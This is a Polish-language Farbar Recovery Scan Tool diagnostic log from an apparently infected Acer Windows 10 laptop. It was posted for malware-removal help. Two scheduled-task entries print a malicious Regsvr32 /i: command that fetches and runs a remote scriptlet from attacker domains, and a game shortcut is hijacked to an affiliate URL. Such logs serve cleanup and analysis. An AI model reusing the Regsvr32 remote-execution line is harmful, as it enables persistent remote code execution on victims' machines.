2017-04-08 23:29 - 2017-03-17 16:24 - 00532136 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2017-04-08 22:44 - 2016-11-26 01:22 - 00000000 ____D C:\Program Files (x86)\ASIO4ALL v2
2017-04-08 21:30 - 2016-11-26 00:32 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-04-08 21:15 - 2017-01-28 08:55 - 00000000 ____D C:\Users\Emil\Desktop\Proje
2017-04-06 22:27 - 2016-11-25 23:50 - 00000000 ____D C:\Users\Emil\AppData\Local\Adobe
2017-04-06 21:47 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\Macromed
2017-04-02 23:15 - 2017-02-05 23:51 - 00002013 _____ C:\Users\Public\Desktop\McAfee Security Scan Plus.lnk
2017-04-02 23:15 - 2016-11-26 00:21 - 00000000 ____D C:\Program Files\McAfee Security Scan
2017-04-01 20:52 - 2016-07-16 13:49 - 00835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2017-04-01 20:52 - 2016-07-16 13:49 - 00177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2017-03-31 07:42 - 2016-08-18 07:58 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
2017-03-29 09:15 - 2016-05-05 18:09 - 00000000 ____D C:\ProgramData\McAfee
2017-03-28 08:20 - 2016-11-21 11:11 - 02717184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2017-03-20 16:51 - 2016-05-05 18:09 - 00000000 ____D C:\Program Files\Common Files\McAfee

==================== Pliki w katalogu głównym wybranych folderów =======

2017-03-01 12:12 - 2017-03-01 12:12 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

Niektóre pliki w TEMP:
====================
2017-03-03 09:19 - 2017-03-03 09:20 - 38421056 _____ (SweetLabs,Inc.) C:\Users\Emil\AppData\Local\Temp\oct6813.tmp.exe
2017-04-16 14:49 - 2017-04-16 14:59 - 59080608 _____ (SweetLabs,Inc.) C:\Users\Emil\AppData\Local\Temp\oct6C68.tmp.exe
2017-04-16 14:59 - 2017-04-16 15:02 - 58523032 _____ (SweetLabs,Inc.) C:\Users\Emil\AppData\Local\Temp\oct8227.tmp.exe

==================== Bamital & volsnap ======================

(Brak automatycznej naprawy dla plików które nie przeszły weryfikacji.)

C:\WINDOWS\system32\winlogon.exe => Plik podpisany cyfrowo
C:\WINDOWS\system32\wininit.exe => Plik podpisany cyfrowo
C:\WINDOWS\explorer.exe => Plik podpisany cyfrowo
C:\WINDOWS\SysWOW64\explorer.exe => Plik podpisany cyfrowo
C:\WINDOWS\system32\svchost.exe => Plik podpisany cyfrowo
C:\WINDOWS\SysWOW64\svchost.exe => Plik podpisany cyfrowo
C:\WINDOWS\system32\services.exe => Plik podpisany cyfrowo
C:\WINDOWS\system32\User32.dll => Plik podpisany cyfrowo
C:\WINDOWS\SysWOW64\User32.dll => Plik podpisany cyfrowo
C:\WINDOWS\system32\userinit.exe => Plik podpisany cyfrowo
C:\WINDOWS\SysWOW64\userinit.exe => Plik podpisany cyfrowo
C:\WINDOWS\system32\rpcss.dll => Plik podpisany cyfrowo
C:\WINDOWS\system32\dnsapi.dll => Plik podpisany cyfrowo
C:\WINDOWS\SysWOW64\dnsapi.dll => Plik podpisany cyfrowo
C:\WINDOWS\system32\Drivers\volsnap.sys => Plik podpisany cyfrowo

LastRegBack: 2017-04-12 16:11

==================== Koniec  FRST.txt ============================


Addition

Kod: Zaznacz wszystko
Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja: 17-04-2017 01
Uruchomiony przez Emil (19-04-2017 19:45:36)
Uruchomiony z C:\Users\Emil\Downloads
Windows 10 Home Wersja 1607 (X64) (2017-03-01 10:49:12)
Tryb startu: Normal
==========================================================


==================== Konta użytkowników: =============================

Administrator (S-1-5-21-2400838556-3398951076-1685541893-500 - Administrator - Disabled)
Emil (S-1-5-21-2400838556-3398951076-1685541893-1001 - Administrator - Enabled) => C:\Users\Emil
Gość (S-1-5-21-2400838556-3398951076-1685541893-501 - Limited - Disabled)
Konto domyślne (S-1-5-21-2400838556-3398951076-1685541893-503 - Limited - Disabled)

==================== Centrum zabezpieczeń ========================

(Załączenie wejścia w fixlist spowoduje jego usunięcie.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: McAfee  — ochrona antywirusowa i przed oprogramowaniem szpiegującym (Disabled - Up to date) {8BCDACFA-D264-3528-5EF8-E94FD0BC1FBC}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: McAfee  — ochrona antywirusowa i przed oprogramowaniem szpiegującym (Disabled - Up to date) {30AC4D1E-F45E-3AA6-6448-D23DAB3B5501}
FW: McAfee Firewall (Disabled) {B3F62DDF-980B-3470-75A7-407A2E6F58C7}

==================== Zainstalowane programy ======================

(W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.)

12 Labours of Hercules III: Girl Power (x32 Version: 3.0.2.118 - WildTangent) Hidden
abFiles (HKLM-x32\...\{13885028-098C-4799-9B71-27DAC96502D5}) (Version: 2.03.2003 - Acer Incorporated)
abPhoto (HKLM-x32\...\{B5AD89F2-03D3-4206-8487-018298007DD0}) (Version: 3.08.2003.3 - Acer Incorporated)
Acer Care Center (HKLM\...\{1AF41E84-3408-499A-8C93-8891F0612719}) (Version: 2.00.3024 - Acer Incorporated)
Acer Configuration Manager (HKLM-x32\...\{414D554E-4453-454E-0201-000000016258}) (Version: 2.1.16258 - Acer)
Acer Portal (HKLM-x32\...\{A5AD0B17-F34D-49BE-A157-C8B3D52ACD13}) (Version: 3.08.2006 - Acer Incorporated)
Acer Quick Access (HKLM\...\{8BBF04F1-C68A-441C-B5EF-446EE9960EAF}) (Version: 2.01.3003 - Acer Incorporated)
Acer UEIP Framework (HKLM\...\{12A718F2-2357-4D41-9E1F-18583A4745F7}) (Version: 3.01.3001 - Acer Incorporated)
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.127 - Adobe Systems Incorporated)
Adobe Reader 9.5.0 - Polish (HKLM-x32\...\{AC76BA86-7AD7-1045-7B44-A95000000001}) (Version: 9.5.0 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.2 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.2.5.195 - Adobe Systems, Inc.)
Aktualizacje NVIDIA 2.11.4.1 (Version: 2.11.4.1 - NVIDIA Corporation) Hidden
Amazon Assistant (HKLM-x32\...\{5437E77B-E4B5-45E7-BD33-95C3F0AA6602}) (Version: 10.17.0228 - Amazon) <==== UWAGA
AOP Framework (HKLM-x32\...\{4A37A114-702F-4055-A4B6-16571D4A5353}) (Version: 3.22.2001.0 - Acer Incorporated)
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
BitComet 1.44 (HKLM-x32\...\BitComet_x64) (Version: 1.44 - CometNetwork)
Cheat Engine 6.6 (HKLM-x32\...\Cheat Engine 6.6_is1) (Version:  - Cheat Engine)
CyberLink PowerDVD 12 (HKLM-x32\...\InstallShield_{B46BEA36-0B71-4A4E-AE41-87241643FA0A}) (Version: 12.0.5917.02 - CyberLink Corp.)
Dashlane Upgrade Service (HKLM-x32\...\Dashlane Upgrade Service) (Version: 2.0.14.0 - Dashlane SAS)
DLL-Files.com Client (HKLM-x32\...\DA71BA65-680A-4212-9150-6239217B53DC_DLL-Files.c~79141F26_is1) (Version: 2.1.1000.4462 - DLL-Files.com Client)
DriverSetupUtility (HKLM\...\{2B51C83A-465D-4EA9-9CDC-1ED95ED09AC6}) (Version: 1.00.3011 - Acer Incorporated)
Emergency 2017 (HKLM-x32\...\Emergency 2017_is1) (Version:  - )
Farm Expert 2017 (HKLM-x32\...\Farm Expert 2017_is1) (Version:  - )
Farming Simulator 17 (HKLM\...\ZmFybWluZ3NpbXVsYXRvcjE3_is1) (Version: 1 - )
FL Studio 12 (HKLM-x32\...\FL Studio 12) (Version:  - Image-Line)
FL Studio ASIO (HKLM-x32\...\FL Studio ASIO) (Version:  - Image-Line)
Game Explorer Categories - genres (HKLM-x32\...\WildTangentGameProvider-acer-genres) (Version: 13.0.0.6 - WildTangent, Inc.)
Game Explorer Categories - main (HKLM-x32\...\WildTangentGameProvider-acer-main) (Version: 13.0.0.6 - WildTangent, Inc.)
GG (HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\...\GG) (Version: 12 - GG Network S.A.)
Home Makeover (x32 Version: 3.0.2.59 - WildTangent) Hidden
IL Download Manager (HKLM-x32\...\IL Download Manager) (Version:  - Image-Line)
Intel Security True Key (HKLM\...\TrueKey) (Version: 4.9.108.1 - Intel Security)
Intel(R) Chipset Device Software (x32 Version: 10.1.1.7 - Intel(R) Corporation) Hidden
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.0.1153 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4531 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 14.5.0.1081 - Intel Corporation)
Intel(R) Serial IO (HKLM\...\{9FD91C5C-44AE-4D9D-85BE-AE52816B0294}) (Version: 1.1.253.0 - Intel Corporation)
Intel® Security Assist (HKLM-x32\...\{4B230374-6475-4A73-BA6E-41015E9C5013}) (Version: 1.0.0.532 - Intel Corporation)
Jewel Match 3 (x32 Version: 2.2.0.97 - WildTangent) Hidden
Jewel Match Snowscapes (x32 Version: 3.0.2.118 - WildTangent) Hidden
Magic Academy (x32 Version: 2.2.0.97 - WildTangent) Hidden
Malwarebytes (wersja 3.0.6.1469) (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.6.1469 - Malwarebytes)
McAfee LiveSafe  (HKLM-x32\...\MSC) (Version: 14.0.12000 - McAfee, Inc.)
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.11.523.1 - McAfee, Inc.)
McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.124 - McAfee, Inc.)
Microsoft Office 365 - pl-pl (HKLM\...\O365HomePremRetail - pl-pl) (Version: 16.0.7870.2031 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\...\OneDriveSetup.exe) (Version: 17.3.6798.0207 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.30319 (HKLM\...\{DA5E371C-6333-3D8A-93A4-6FD5B20BCC6E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.30319 (HKLM-x32\...\{196BB40D-1578-3D01-B289-BEFC77A11A1E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23026 (HKLM-x32\...\{74d0e5db-b326-4dae-a6b2-445b9de1836e}) (Version: 14.0.23026.0 - Microsoft Corporation)
Mozilla Firefox 52.0.2 (x86 pl) (HKLM-x32\...\Mozilla Firefox 52.0.2 (x86 pl)) (Version: 52.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 52.0.2.6291 - Mozilla)
My Connection (HKLM-x32\...\My Connection_is1) (Version:  - TCT Mobile Limited)
NVIDIA PhysX System Software 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation)
NVIDIA Sterownik graficzny 376.54 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 376.54 - NVIDIA Corporation)
Office 16 Click-to-Run Extensibility Component (x32 Version: 16.0.7870.2024 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (Version: 16.0.7870.2024 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (Version: 16.0.7870.2024 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (x32 Version: 16.0.7668.2066 - Microsoft Corporation) Hidden
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
OpenFM (HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\...\OpenFM) (Version: 4.0.0.1 - Grupa Wirtualna Polska)
Opera Stable 44.0.2510.23876 (HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\...\Opera 44.0.2510.23876) (Version: 44.0.2510.23876 - Opera Software)
Panel sterowania NVIDIA 376.54 (Version: 376.54 - NVIDIA Corporation) Hidden
Polar Bowler 1st Frame (x32 Version: 3.0.2.59 - WildTangent) Hidden
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.986 - Even Balance, Inc.)
Qualcomm Atheros 11ac Wireless LAN&Bluetooth Installer (HKLM-x32\...\{3241744A-BA36-41F0-B4AA-EF3946D00632}) (Version: 11.0.0.10164 - Qualcomm Atheros)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.10125.31214 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.1.505.2015 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7553 - Realtek Semiconductor Corp.)
Rory's Restaurant (x32 Version: 3.0.2.126 - WildTangent) Hidden
Runefall (x32 Version: 3.0.2.126 - WildTangent) Hidden
ScreenShot (HKLM-x32\...\ScreenShot) (Version: 2.0.4 - Filseclab Corporation)
SHIELD Streaming (Version: 7.1.0280 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.11.4.1 - NVIDIA Corporation) Hidden
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Sylenth1 v2.21 (HKLM-x32\...\Sylenth1_is1) (Version:  - )
The Sims 4 (HKLM-x32\...\VGhlU2ltczQ=_is1) (Version: 1 - )
The Sims™ 4 (HKLM-x32\...\{48EBEBBF-B9F8-4520-A3CF-89A730721917}) (Version: 1.0.732.20 - Electronic Arts Inc.)
Update Installer for WildTangent Games App (x32 Version:  - WildTangent) Hidden
Vegas World (x32 Version: 13.0.0.6 - WildTangent) Hidden
Villagers and Heroes (x32 Version: 13.0.0.6 - WildTangent) Hidden
Vulkan Run Time Libraries 1.0.26.0 (HKLM\...\VulkanRT1.0.26.0) (Version: 1.0.26.0 - LunarG, Inc.)
WarThunder (HKLM-x32\...\WarThunder) (Version:  - ) <==== UWAGA
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.4.0 - WildTangent)
WildTangent Games App (x32 Version: 4.1.1.12 - WildTangent) Hidden
WildTangent Games App (x32 Version: 4.1.1.30 - WildTangent) Hidden
Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation)
WinRAR 5.40 (64-bitowy) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
Wolfenstein - Enemy Territory (HKLM-x32\...\Wolfenstein - Enemy Territory) (Version: 2.60b - ACTIVISION)

==================== Niestandardowe rejestracje CLSID (filtrowane): ==========================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

CustomCLSID: HKU\S-1-5-21-2400838556-3398951076-1685541893-1001_Classes\CLSID\{E68D0A55-3C40-4712-B90D-DCFA93FF2534}\InprocServer32 -> C:\Users\Emil\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll (GG Network S.A.)

==================== Zaplanowane zadania (filtrowane) =============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

Task: {0481BC6E-5635-4CA5-9A47-AC5F661D507F} - System32\Tasks\ACC => C:\Program Files (x86)\Acer\Care Center\LiveUpdateChecker.exe [2016-01-20] ()
Task: {1376E58F-0645-4C76-B5AF-7A8CCAB62F93} - System32\Tasks\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\RunCampaignManager2 => C:\Windows\system32\UNP\UNPCampaignManager.exe [2017-04-02] (Microsoft Corporation)
Task: {2C9972C8-3D95-4A9B-A219-F054CF4EE38B} - System32\Tasks\Opera scheduled Autoupdate 1491594233 => C:\Users\Emil\AppData\Local\Programs\Opera\launcher.exe [2017-04-03] (Opera Software)
Task: {30D2F5E3-A7DC-477D-8DAA-73D828D956FE} - System32\Tasks\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Logon => C:\WINDOWS\system32\UNP\UNPUXLauncher.exe [2017-04-02] (Microsoft Corporation)
Task: {355F852A-7001-4393-A65A-7457F7E17AF9} - System32\Tasks\ACCBackgroundApplication => C:\Program Files (x86)\Acer\Care Center\ACCStd.exe [2016-01-20] ()
Task: {42B3F5AF-883C-4486-9188-2DB20304944E} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1SNTI5NdlQOTkxFdLWOWY4RTH1MWLLNWQQRjZSFUY2Mq== scrobj.dll
Task: {4B207BDE-B791-48C9-98B6-2D4A38E7C537} - System32\Tasks\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Unlock => C:\WINDOWS\system32\UNP\UNPUXLauncher.exe [2017-04-02] (Microsoft Corporation)
Task: {5A8C5CDE-3D27-4211-A3B4-D4A8D5FBB8DA} - System32\Tasks\BacKGroundAgent => C:\Program Files (x86)\Acer\AOP Framework\BackgroundAgent.exe [2016-08-30] (Acer Incorporated)
Task: {627837C5-4A24-45D8-8540-1F8FF3948FB9} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1SNTI5NdlQOTkxFdLWOWY4RTH1MWLLNWQQRjZSFUY2Mq== scrobj.dll
Task: {817C99BF-8221-4AA7-993C-2FD64F46E89B} - System32\Tasks\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\OnIdle => C:\WINDOWS\system32\UNP\UNPUXLauncher.exe [2017-04-02] (Microsoft Corporation)
Task: {83DFD5DC-DFD8-463E-8DD4-47C7D391AC35} - System32\Tasks\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\OutOfIdle => C:\WINDOWS\system32\UNP\UNPUXLauncher.exe [2017-04-02] (Microsoft Corporation)
Task: {88DA94EF-75F4-4927-92C9-E1BB628FC2FC} - System32\Tasks\Quick Access => C:\Program Files\Acer\Acer Quick Access\QALauncher.exe [2016-03-11] (Acer Incorporated)
Task: {8985ED19-C2F3-44C5-A1BD-53732428A47C} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent
Task: {941500AD-B8E6-4F99-BEDE-E4AD314D89A6} - System32\Tasks\AcerCMUpdateTask2.1.16258 => C:\Program Files (x86)\Acer\Amundsen\2.1.16258\AWC.exe [2016-09-20] ()
Task: {982E8A31-B494-42FC-8CFE-1062953DD965} - System32\Tasks\AcerCloud => C:\Program Files (x86)\Acer\Acer Portal\AcerPortal.exe [2015-10-15] (Acer)
Task: {9DDAE723-7705-4F4B-8206-8A0F5777B03B} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\platform\McUICnt.exe [2016-12-09] (McAfee, Inc.)
Task: {B0A1AD74-05A7-4252-8130-70601E0180A2} - System32\Tasks\UbtFrameworkService => C:\Program Files\Acer\User Experience Improvement Program\Framework\TriggerFramework.exe [2014-03-13] (TODO: <Company name>)
Task: {C1F9446B-E21E-4DBA-A51F-781328F68EED} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-03-02] (Microsoft Corporation)
Task: {C3CD0E51-E4FD-4B31-8D43-B10133E5F7A8} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-03-02] (Microsoft Corporation)
Task: {C708875B-767C-4C17-A8F3-15FDF2DBA081} - System32\Tasks\McAfee\McAfee Idle Detection Task
Task: {CE98BF72-99E0-4BDE-AC69-EDC8D0627C93} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] ()
Task: {DA373233-071A-4568-B38E-078241CD5DD3} - System32\Tasks\Software Update Application => C:\ProgramData\OEM\UpgradeTool\ListCheck.exe [2016-01-20] (Acer Incorporated)
Task: {E28D7D70-5F9A-4819-90B5-C2819368534A} - System32\Tasks\ACCAgent => C:\Program Files (x86)\Acer\Care Center\LiveUpdateAgent.exe [2016-01-20] ()
Task: {E424E08F-0CA7-43E4-9179-3D1F28CE22E7} - System32\Tasks\Power Button => C:\Program Files\Acer\Acer Quick Access\ePowerButton_NB.exe [2016-03-11] (Acer Incorporated)
Task: {E4277888-B743-4447-A51A-1CAB692AB3B0} - System32\Tasks\FUBTrackingByPLD => C:\OEM\Preload\FubTracking\FubTracking.exe [2015-05-14] ()
Task: {EDCEE5C2-70E2-43EF-A795-5F3570F97617} - System32\Tasks\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Time => C:\WINDOWS\system32\UNP\UNPUXLauncher.exe [2017-04-02] (Microsoft Corporation)
Task: {F9485922-770D-4C49-945A-1E5B9421086B} - System32\Tasks\Microsoft\Windows\UNP\RunCampaignManager => C:\WINDOWS\System32\UNP\UNPCampaignManager.exe [2017-04-02] (Microsoft Corporation)
Task: {FC3626F8-D2BF-44C6-BCED-EA83613E8F51} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonx86\Microsoft Shared\Office16\OLicenseHeartbeat.exe [2017-03-26] (Microsoft Corporation)

(Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.)


==================== Skróty =============================

(Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.)

ShortcutWithArgument: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WarThunder\WarThunder.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://go.playmmogames.com/aff_c?offer_id=698&aff_id=1034&source=1&click_id=e2fe395430f173bfde38c2993e006e118be6b507

==================== Załadowane moduły (filtrowane) ==============

2016-07-16 13:42 - 2016-07-16 13:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2017-04-12 11:11 - 2017-03-28 08:22 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2017-02-03 17:07 - 2015-09-24 15:57 - 00574464 _____ () C:\Program Files (x86)\My Connection\ApplicationController.exe
2015-05-19 18:11 - 2015-05-19 18:11 - 00007680 _____ () C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe
2016-11-25 17:36 - 2016-06-15 03:14 - 00369208 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\MessageBus.dll
2016-11-25 17:35 - 2016-06-15 03:14 - 00289848 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamBase.dll
2016-11-25 17:36 - 2016-06-15 03:14 - 03613240 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Poco.dll
2016-11-25 17:36 - 2016-06-15 03:14 - 01148984 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\libprotobuf.dll
2016-12-07 17:34 - 2016-12-07 17:34 - 00066872 _____ () C:\WINDOWS\SysWOW64\PnkBstrA.exe
2016-12-07 17:34 - 2016-12-07 17:34 - 00107832 _____ () C:\WINDOWS\SysWOW64\PnkBstrB.exe
2017-02-28 16:19 - 2017-02-28 16:19 - 00102064 _____ () C:\Program Files (x86)\Amazon\Amazon Assistant\amazonAssistantService.exe
2017-02-28 16:20 - 2017-02-28 16:20 - 00141488 _____ () C:\Program Files (x86)\Amazon\Amazon Assistant\aaLoader64.dll
2017-03-01 12:13 - 2016-12-29 15:16 - 00134712 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2016-11-25 17:36 - 2016-06-15 03:14 - 02667576 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\NvMdnsPlugin.dll
2016-11-25 17:36 - 2016-06-15 03:14 - 01990200 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\NvPortForwardPlugin.dll
2016-11-25 17:36 - 2016-06-15 03:14 - 01842232 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\RtspPlugin.dll
2016-11-25 17:36 - 2016-06-15 03:14 - 00208952 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\RtspServer.dll
2016-11-25 17:35 - 2016-06-15 03:14 - 00921656 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_regex-vc120-mt-1_58.dll
2016-11-25 17:35 - 2016-06-15 03:14 - 00035896 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_system-vc120-mt-1_58.dll
2016-08-18 10:02 - 2015-05-14 09:10 - 00030976 _____ () C:\OEM\Preload\FubTracking\FubTracking.exe
2017-04-12 11:11 - 2017-03-28 08:22 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2016-01-20 20:50 - 2016-01-20 20:50 - 04644256 _____ () C:\Program Files (x86)\Acer\Care Center\ACCStd.exe
2016-11-21 10:41 - 2016-11-21 10:41 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2017-03-14 22:30 - 2017-03-04 08:31 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2017-04-19 18:33 - 2017-01-20 07:47 - 02264352 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\PoliciesControllerImpl.dll
2017-04-19 18:33 - 2017-01-20 07:47 - 02829776 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\arwlib.dll
2017-04-19 18:33 - 2017-01-20 07:47 - 02254800 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
2017-04-10 20:11 - 2017-04-10 20:15 - 00077312 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.13.133.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2017-04-10 20:11 - 2017-04-10 20:15 - 00189952 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.13.133.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2017-04-19 19:34 - 2017-04-19 19:37 - 00380928 _____ () C:\Users\Emil\Downloads\5ymv7ohx.exe
2017-02-03 17:07 - 2014-11-13 17:52 - 00011362 _____ () C:\Program Files (x86)\My Connection\mingwm10.dll
2017-02-03 17:07 - 2014-11-13 17:52 - 00043008 _____ () C:\Program Files (x86)\My Connection\libgcc_s_dw2-1.dll
2017-02-03 17:07 - 2014-11-13 17:51 - 02537472 _____ () C:\Program Files (x86)\My Connection\QtCore4.dll
2017-02-03 17:07 - 2015-09-24 15:55 - 01054208 _____ () C:\Program Files (x86)\My Connection\Common.dll
2017-02-03 17:07 - 2014-11-13 17:51 - 09814016 _____ () C:\Program Files (x86)\My Connection\QtGui4.dll
2017-02-03 17:07 - 2014-11-13 17:51 - 01140224 _____ () C:\Program Files (x86)\My Connection\QtNetwork4.dll
2016-08-18 09:33 - 2016-06-15 03:14 - 00020536 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2017-04-17 15:31 - 2017-04-17 05:03 - 00106496 _____ () c:\programdata\software\apple\apps\notification.dll
2016-08-15 19:03 - 2016-08-15 19:03 - 00202456 _____ () C:\Program Files (x86)\Acer\abPhoto\curllib.dll
2016-08-15 19:05 - 2016-08-15 19:05 - 00654000 _____ () C:\Program Files (x86)\Acer\abPhoto\sqlite3.dll
2016-08-15 19:05 - 2016-08-15 19:05 - 00641240 _____ () C:\Program Files (x86)\Acer\abPhoto\tag.dll
2016-08-15 19:04 - 2016-08-15 19:04 - 00119000 _____ () C:\Program Files (x86)\Acer\abPhoto\OpenLDAP.dll
